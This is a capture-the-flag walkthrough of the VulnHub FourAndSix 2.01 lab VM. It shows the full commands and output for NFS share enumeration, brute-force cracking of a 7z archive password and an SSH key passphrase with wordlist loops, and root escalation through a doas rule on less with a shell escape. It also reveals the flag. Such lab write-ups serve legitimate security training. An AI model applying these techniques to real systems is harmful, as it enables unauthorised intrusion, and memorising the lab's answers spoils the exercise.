This post records the penetration-testing walkthrough of FourAndSix 2.01; the test VM comes from www.vulnhub.com
Blog series: CTF-oriented OSCP practice series
Download link: FourAndSix 2.01
2019-04-13 19:19:03 [Original]
Name: FourAndSix: 2.01
Date release: 28 Oct 2018
Description: Task is to become root and read /root/flag.txt.
The target IP is unknown at first, so use netdiscover for host discovery
root@kali:~# netdiscover -r 10.10.10.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 4 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.10.10.1 00:50:56:c0:00:08 2 120 VMware, Inc.
10.10.10.2 00:50:56:fb:16:b2 1 60 VMware, Inc.
10.10.10.76 00:0c:29:62:56:41 1 60 VMware, Inc.
10.10.10.254 00:50:56:e0:63:df 1 60 VMware, Inc.
The target is 10.10.10.76; next, probe its ports with nmap
-Pn: skip host discovery (no ping), because some hosts disable ICMP
-p-: scan all ports, equivalent to -p 1-65535
root@kali:~# nmap -Pn -p- 10.10.10.76
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 01:28 EDT
Nmap scan report for 10.10.10.76
Host is up (0.00054s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
820/tcp open unknown
2049/tcp open nfs
MAC Address: 00:0C:29:62:56:41 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 707.82 seconds
Surprisingly, an NFS service is exposed. NFS stands for Network File System.
# may need to be installed first: apt-get install nfs-common
root@kali:~# showmount -e 10.10.10.76
Export list for 10.10.10.76:
/home/user/storage (everyone)
One directory (/home/user/storage) is exported to everyone, so mount it on the local machine
root@kali:~# mount -t nfs 10.10.10.76:/home/user/storage ctf-nfs/
root@kali:~# cd ctf-nfs/
root@kali:~/ctf-nfs# ls
backup.7z
root@kali:~/ctf-nfs# 7z e backup.7z
Enter password (will not be echoed):
# extraction prompts for a password
Next, the archive password has to be found
# Method 1
root@kali:~/ctf-nfs# rarcrack --thread 4 --type 7z backup.7z
# Method 2:
Source: https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/7z-crack.sh
root@kali:~/ctf-nfs# cat 7z-crack.sh
# usage: ./7z-crack.sh <archive> <wordlist>; tries each wordlist entry as the archive password
while read -r line; do if 7z e "$1" -p"$line" -y >/dev/null 2>&1; then echo "FOUND PASSWORD: $line"; break; fi; done < "$2"
root@kali:~/ctf-nfs# chmod 777 7z-crack.sh
root@kali:~/ctf-nfs# ./7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt
# Method 3
Online cracking: https://www.lostmypass.com/
# Method 4
Source: https://github.com/koboi137/john/7z2john.pl
root@kali:~/ctf-nfs# git clone https://github.com/koboi137/john
root@kali:~/ctf-nfs/john-master# ./7z2john.pl ../backup.7z > ../backup.7z.hash
root@kali:~/ctf-nfs/john-master# john -w:/usr/share/wordlists/rockyou.txt ../backup.7z.hash
Whichever method is used, the result is the same: the password is chocolate
root@kali:~/ctf-nfs# 7z e backup.7z
root@kali:~/ctf-nfs# ssh-keygen -l -f id_rsa.pub
2048 SHA256:BPl29YrxUBdBmLaG6K58UGlR0wruEBQE8vGOtrbXl8Y user@fourandsix2 (RSA)
The archive holds an RSA key pair for SSH access. Logging in with the key still prompts for a passphrase, so there is a second password to crack
root@kali:~/ctf-nfs# ssh -i id_rsa user@10.10.10.76
# crack the key passphrase
root@kali:~/ctf-nfs# cat /usr/share/wordlists/rockyou.txt | while read -r pass; do if ssh-keygen -c -C "user@forandsix" -P "$pass" -f id_rsa >/dev/null 2>&1; then echo "$pass"; break; fi; done
The passphrase is 12345678
root@kali:~/ctf-nfs# ssh -i id_rsa user@10.10.10.76
Enter passphrase for key 'id_rsa': 12345678
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)
Privilege escalation
fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$
One of them is /usr/bin/doas, which normally plays the same role as sudo; start there
fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
Run the permitted command to escalate
fourandsix2$ doas /usr/bin/less /var/log/authlog
Press v to drop into vi, then type :!sh to get a brand-new shell
Grab the flag
fourandsix2# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
fourandsix2# cat /root/flag.txt
Nice you hacked all the passwords!
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42
fourandsix2#